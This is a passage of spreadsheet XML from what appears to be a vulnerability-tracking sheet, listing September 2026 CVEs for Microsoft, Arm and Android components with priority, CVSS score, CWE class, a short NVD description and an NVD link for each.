      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56198</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5729</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S456" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform valid GPU processing operations to access already freed memory.
This issue affects Valhall GPU Kernel Driver: from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58599</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58600</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58611</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr">
        <is>
          <t>microsoft:xbox_gaming_services</t>
        </is>
      </c>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58820</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58823</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58839</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58846</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58874</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S464" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58941</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62697</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K466" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62804</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q467" s="5" t="inlineStr"/>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S467" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62810</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q468" s="5" t="inlineStr"/>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S468" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68787</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K469" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q469" s="5" t="inlineStr"/>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S469" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68832</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47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70" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q470" s="5" t="inlineStr"/>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S470" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68841</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr">
        <is>
